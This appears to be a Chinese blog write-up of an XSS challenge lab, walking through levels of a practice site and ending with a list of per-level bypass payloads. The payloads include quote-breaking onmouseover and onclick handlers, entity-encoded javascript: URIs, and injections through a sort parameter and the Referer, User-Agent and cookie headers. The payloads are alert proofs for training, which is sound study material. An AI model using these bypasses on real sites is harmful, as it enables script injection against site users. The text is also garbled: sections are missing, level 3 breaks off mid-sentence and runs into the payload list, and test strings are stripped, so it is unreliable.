【XSS漏洞05】XSS通关大挑战

目录

  • 1 实验简介
  • 2 通关过程
    • 2.0 通关前准备
    • 2.1 关卡1
    • 2.2 关卡2
    • 2.3 关卡3
    • 2.4 关卡4
    • 2.5 关卡5
    • 2.6 关卡6
    • 2.7 关卡7
    • 2.8 关卡8
    • 2.9 关卡9
    • 2.10 关卡10
    • 2.11 关卡11
    • 2.12 关卡12
    • 2.13 关卡13
    • 2.14 通关命令汇总
  • 3 总结
  • 参考文献

1 实验简介

  1. 实验网站:http://test.ctf8.com/。
  2. 实验目的:
    1. 熟悉XSS漏洞测试的过程;
    2. 判断是否过滤与过滤规则;
    3. 练习XSS语句构造与绕过方法;
    4. 一边练习一边结合SQL注入进行比较;
    5. 一边练习一边思考编码与转码,后续补充这一方面的学习。

2 通关过程

2.0 通关前准备

  1. 在测试过程中,有哪些东西是我们可以利用来猜测与判断的:
    1. 网页页面的变化;
    2. 审查网页元素;
    3. 查看网页源码;
    4. 如果是白盒测试,还可以进行代码审计。
  2. 一个好用的方便我们判断网页后台对输入语句过滤规则的语句:,轻松带走。
    【XSS漏洞05】XSS通关大挑战_第4张图片

2.2 关卡2

  1. 理所当然地接受表扬并点击确定进入关卡2,提示让你保存冷静并嘲讽你尝试个头。
    【XSS漏洞05】XSS通关大挑战_第5张图片
  2. 老规矩先打一套测试语句,<",顺利通过轻松带走。

2.3 关卡3

  1. 老规矩先打一套测试语句,<" //关卡3 'οnmοuseοver='alert(/xss/) //关卡4 "οnmοuseοver="alert(/xss/) //关卡5 ">:alert(/xss/)">click me!<" //关卡6 ">:alert(/xss/)">click me!<" //关卡7 ">alert(/xss/)<" //关卡8 javas&#x63;ript:alert(/xss/) //关卡9 javas&#x63;ript:alert('http://') //关卡10 ?t_sort=click me!" type="button" οnclick="alert(/xss/) //关卡11 referer:click me!" type="button" οnclick="alert(/xss/) //关卡12 User-agent:click me!" type="button" οnclick="alert(/xss/) //关卡13 cookie-user:click me!" type="button" οnclick="alert(/xss/)

    3 总结

    1. 通过测试语句执行情况、网页源码:
      1. 判断大小于号是否过滤与转义;
      2. 判断单双引号是否过滤与转义;
      3. 判断关键字是否过滤与转义;
      4. 判断大小写是否转化;
      5. 判断语句闭合方式。
      6. 额外地,可以分析是否存在其他注入点。
    2. 根据判断结果,灵活构造语句与利用绕过规则。

    参考文献

    1. 《BurpSuite简介及安装》
    2. 《BurpSuite截获请求并生成文件》

你可能感兴趣的:(#,筑基07:WEB漏洞原理,xss,web安全,前端)